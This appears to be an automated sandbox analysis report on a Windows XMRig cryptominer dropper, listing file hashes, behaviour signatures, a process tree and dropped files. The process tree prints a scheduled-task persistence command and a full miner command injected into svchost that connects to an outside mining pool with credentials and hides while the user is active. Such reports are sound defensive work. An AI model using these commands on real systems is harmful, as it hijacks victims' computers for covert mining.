Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 13:46

General

  • Target

    acbb006e8058c64550ee9eecbf2af3e5.exe

  • Size

    2.0MB

  • MD5

    acbb006e8058c64550ee9eecbf2af3e5

  • SHA1

    d130ad978d321334a4a3796bdd923c8eeb1a3c5a

  • SHA256

    4c47805425ed2fe731a5ae0c0b6d9664ac099f829fce0c89728ab1660a560450

  • SHA512

    385f44b8161563d9b9e625bcb0ccfa74f3f1fb28af91fce6095b4b2b8003661957ade0b3ff70d8dd74d5ecaf39a53bd4168c626141b19822931e7801e011a523

  • SSDEEP

    24576:FntPnQqwZVK4GzGjr5TFN0qT3oMfA85FmCdy007dYbgRXs9PQBvcipHoauqLjuCb:ht4qwvizGr5TFNX087oRXn/oLCLP

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\acbb006e8058c64550ee9eecbf2af3e5.exe
    "C:\Users\Admin\AppData\Local\Temp\acbb006e8058c64550ee9eecbf2af3e5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3256
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dll32" /tr '"C:\Users\Admin\AppData\Roaming\dll32.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "dll32" /tr '"C:\Users\Admin\AppData\Roaming\dll32.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:408
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      PID:4988
    • C:\Users\Admin\AppData\Roaming\dll32.exe
      "C:\Users\Admin\AppData\Roaming\dll32.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dll32" /tr '"C:\Users\Admin\AppData\Roaming\dll32.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3804
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "dll32" /tr '"C:\Users\Admin\AppData\Roaming\dll32.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1484
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:3464
      • C:\Windows\System32\svchost.exe
        C:\Windows/System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6117623 --pass=CoinMiner7 --cpu-max-threads-hint=20 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=80 --tls
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2552

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

          Filesize

          14KB

          MD5

          0c0195c48b6b8582fa6f6373032118da

          SHA1

          d25340ae8e92a6d29f599fef426a2bc1b5217299

          SHA256

          11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

          SHA512

          ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

          Filesize

          7KB

          MD5

          649399660ce9d3158c1853b51ff50f97

          SHA1

          6b703990e857b95e710f3cdf1af940116679d153

          SHA256

          8dfba0c46dc2afe816be2b5d83b9d8a056c3dedb9b69c2feea517d061b3e8e51

          SHA512

          bdd4ec96954256875da67876a1e2e1d2721f5acca3b65f70f32842de3508ce23d71eb0d9c9729accb89a10c2ea5c8bb3cb28a40077cb43514f37133804f8647b

        • C:\Users\Admin\AppData\Roaming\dll32.exe

          Filesize

          358KB

          MD5

          7fe030429f5928f7ffbd19986c8abd9e

          SHA1

          21bd71ce765549d3d3a98c52a24c69b5d840d401

          SHA256

          3fb16c7f54d510c9d8ea8dc81320d08d7bc30a1edb7eee9ae4306cfec0957ca7

          SHA512

          faf1bda34ada0d0cd5adb0da753951bd961807338358c33678405504056f60661278bf63b94564829e96990b3da1a27fe51765f66116f34f04d828442e565162

        • C:\Users\Admin\AppData\Roaming\dll32.exe

          Filesize

          361KB

          MD5

          ca5962df5ebf99d77cfe0d1e2a91f6fc

          SHA1

          ae397e5bbbee473ec117c362e950b52deb475c9d

          SHA256

          aecae6db8209366ce3ba749545234cd2364437b8e78a9917461ef9e374fc0f5e

          SHA512

          37ef36830eb2435f4a2103092de6dfc4d747b99b201ff762e4c82f4fedbbce0f9b1a657786633e58c7818dcc828a3408e91ca72cc6305fdee853d15821de849a

        • C:\Users\Admin\AppData\Roaming\dll32.exe

          Filesize

          549KB

          MD5

          05521c4c087eb2bf855b4ac9f1b669eb

          SHA1

          7cdf0fd631a92751b9d581b6d9a580f676b167f9

          SHA256

          98765964225a06fad8452b1f58a594d38c4322f532d53a1bb453022676c6d2bf

          SHA512

          e1a8800138a99075c8e900d85e01d1b11d63d730911ba91ca6b97d62edcab3a4cc859f94ff6c3db6eb73dc17c96b33361b83eaf779de6fb7ba402cc4af4afce5

        • memory/2552-62-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-64-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-70-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-67-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-66-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-65-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-63-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-56-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-60-0x00000244D6580000-0x00000244D6594000-memory.dmp

          Filesize

          80KB

        • memory/2552-59-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2552-57-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

        • memory/2680-61-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/2680-33-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/2680-34-0x0000000003AE0000-0x0000000003AF2000-memory.dmp

          Filesize

          72KB

        • memory/2680-55-0x0000000002160000-0x000000000216E000-memory.dmp

          Filesize

          56KB

        • memory/2680-52-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/2680-36-0x000000001CB20000-0x000000001CB30000-memory.dmp

          Filesize

          64KB

        • memory/3256-0-0x0000000000620000-0x0000000000828000-memory.dmp

          Filesize

          2.0MB

        • memory/3256-1-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/3256-32-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/3256-3-0x000000001C4A0000-0x000000001C4B0000-memory.dmp

          Filesize

          64KB

        • memory/3464-54-0x0000000003B40000-0x0000000003B50000-memory.dmp

          Filesize

          64KB

        • memory/3464-53-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/3464-68-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/3464-69-0x0000000003B40000-0x0000000003B50000-memory.dmp

          Filesize

          64KB

        • memory/4988-35-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB

        • memory/4988-25-0x0000000000750000-0x0000000000756000-memory.dmp

          Filesize

          24KB

        • memory/4988-31-0x000000001C260000-0x000000001C270000-memory.dmp

          Filesize

          64KB

        • memory/4988-29-0x00007FFD9DE20000-0x00007FFD9E8E1000-memory.dmp

          Filesize

          10.8MB